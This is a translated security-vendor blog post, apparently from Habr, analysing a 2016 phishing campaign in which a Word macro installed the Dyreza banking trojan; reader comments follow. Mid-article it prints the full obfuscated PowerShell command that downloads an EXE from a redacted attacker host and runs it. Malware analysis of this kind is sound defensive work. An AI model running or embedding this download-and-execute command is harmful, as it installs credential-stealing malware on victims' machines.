Нейтрализована вредоносная программа, способная парализовать работу целого министерства

Автор оригинала: Panda Security
  • Перевод

Кибер-угрозы представляют собой постоянный риск, и они способны в значительной степени влиять на работу государственных органов. Настолько, что они становятся мощным инструментом агрессии против государственных учреждений и граждан. Они способны привести к серьезному ухудшению в качестве обслуживания, а также, помимо всего прочего, к утечке данных, начиная от персональной информации и заканчивая государственной тайной.

Комбинация новых технологий и повышение уровня сложности атак, а также рост профессионального уровня кибер-преступников – все это представляет собой высокую степень опасности. Именно эти тенденции мы ожидаем в 2017 году.

В декабре прошлого года произошла мощная спам-кампания, которая охватила более десятка стран, но в особенности была направлена против одного из значимых европейских министерств. Атака, реализованная с помощью фишинга, была очень продвинутой и сочетала техники социальной инженерии с мощным трояном.

Атака запускалась с письма в электронной почте, в котором был вложен документ Word. Сначала мы подозревали, что это была направленная атака, т.к. сообщение пришло якобы из медицинской компании, а получателем был сотрудник Министерства здравоохранения в одной из европейских стран.

Нижеприведенный анализ описывает технические особенности вредоносного кода, встроенного в макросе документа Word. Задача макроса заключалась в скачивании и запуске другого вредоносного компонента.

Характеристики


Ниже приведено несколько статичных свойств анализируемых файлов.

Хэш документа Word:

MD5: B480B7EFE5E822BD3C3C90D818502068
SHA1: 861ae1beb98704f121e28e57b429972be0410930

В соответствии с метаданными документа, дата создания – 19 декабря 2016 года. Сигнатура вредоносного кода, скачиваемого «вордом»:

MD5: 3ea61e934c4fb7421087f10cacb14832
SHA1: bffb40c2520e923c7174bbc52767b3b87f7364a9

Реализация


1. Векторы заражения
Документ Word попал на компьютер жертвы из спамового электронного письма, отправленного якобы из медицинской компании. Текст в письме пытается заставить получателя поверить в то, что содержимое защищено, а потому необходимо запустить макрос для получения доступа к нему.


Скриншот сообщения

По данным из Коллективного разума компании Panda Security, эта спамовая кампания началась 19 декабря 2016 года и поразила несколько стран.


Карта со странами, которые пострадали от спамовой кампании

Большинство получателей попытались открыть этот документ Word в тот же день, когда и получили его, т.е. 19 декабря.



2. Взаимодействие с зараженной системой
Основная функция макроса состоит в том, чтобы скачать и запустить другой вредоносный код с того URL, что встроен внутри макроса.

Макрос создан таким образом, чтобы запускаться сразу же после его открытия.
Часть кода, содержащегося в макросе:



После того, как макрос запускался, документ Word запускал следующую команду в системе:
________________________________________
cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:\Users\????\AppData\Roaming.Exe’);STaRt-PRoCESS ‘C:\Users\????\AppData\Roaming.eXe’
________________________________________

Команда (cmd.exe) запускает powershell с двумя встроенными командами, определенными специальными параметрами:

1. Первая команда powershell скачивает EXE с этого URL (в %APPDATA%.exe): xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
2. Он создает файл в корне APPDATA.
3. Следующая команда powershell (Start-process) используется для запуска скаченного файла.

Благодаря данным, полученным платформой Коллективного разума компании Panda Security, мы знаем, что последний вредоносный код, который будет распространяться в рамках этой кампании, — это вариант семейства угроз Dyreza. Клиенты Panda были проактивно защищены, а потому в данном случае не потребовались сигнатуры или обновления.

Цель вредоносного кода – кража учетных данных из браузеров и добавление скомпрометированной машины в бот-сеть. После этого компьютер ожидает команды с удаленного сервера управления. Эти команды поступают от кибер-преступников, которые управляют этим «зловредом», и они позволяют скачивать новые вредоносные программы и выполнять все виды вредоносных действий.

Оцифровка в области государственного управления привела к экспоненциальному росту объемов конфиденциальных данных в цифровом виде, которые необходимо создавать, хранить и управлять. Причем далеко не всегда можно осуществлять единый контроль над всеми этими данными.
Panda Security в России и СНГ
Облачные решения безопасности, антивирусы
Реклама
AdBlock похитил этот баннер, но баннеры не зубы — отрастут

Подробнее

Комментарии 9

    +1
    В заголовке указано, что «зловред нейтрализован». А каким образом?
      0
      Честно говоря, тут особо нечего рассказать… Облачная система Panda автоматически заблокировала эту угрозу по определенным признакам. Чуть позже наши коллеги из антивирусной лаборатории PandaLabs обнаружили это, проверяя данные, которые они получают из облака. Облачная система «знает» техники и подходы, которые используются злоумышленниками при атаках через PowerShell, это и сработало.
        0
        То есть антивирус Panda заблокирует вредоноса на ПК, где он установлен. Это понятно.
        Я понадеялся, что там именно сам ботнет нейтрализовали каким-нибудь хитроинтересным способом.
      +1
      Новая единица измерения системы СИ для зловредов? Только непонятно «министерство/час» или «министерство*час». А от других зловредов министерства не могли пострадать?
        0
        Честно, после прочтения заголовка ожидал увидеть что-то про Мизулину или Милонова.
          0
          Небольшая фабрика по производству мебели.
          Регулярно (чаще раза в месяц) получаем на почту разного рода «счета» и «отчеты» — загрузчики шифровальщиков. Каждый третий — документ MS word с макросом в автозапуске, выполняющем после деобфускации в точности такую же команду, разница только в адресе сайта, с которого должен качаться зловред, и имени файла, под которым запускается процесс.
          Вирустотал, как правило, показывает, что файл чист.
          0
          Чет так и пахнет самопиаром.

          браво, взять первый попавшийся банкбот и ворд макрос коих много и написать статью…
            0
            взять первый попавшийся банкбот и ворд макрос коих много и написать статью


            Да, к сожалению, подобных угроз ходит много…

            Данная атака выглядела как направленная атака на министерство здравоохранения в одной из европейских стран.

            Причем она действительно могла парализовать работу всего министерства. Более того, по данным VirusTotal на тот момент ни один антивирусный движок не обнаруживал данную угрозу, хотя в реальной ситуации решения Panda блокировали эту атаку. Ничего не имею против VirusTotal, но не нужно переоценивать значимость его результатов. Многие пользователи думают, что если на VirusTotal движок не обнаруживает угрозу в файле, значит он не может ее блокировать. Хотя на практике далеко не так.

            Потом выяснилось, что данная атака была зафиксирована и в других странах.
            Учитывая все это, наши коллеги из антивирусной лаборатории PandaLabs решили рассказать про эту угрозу, как один из примеров атаки через powershell.

          Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

          Самое читаемое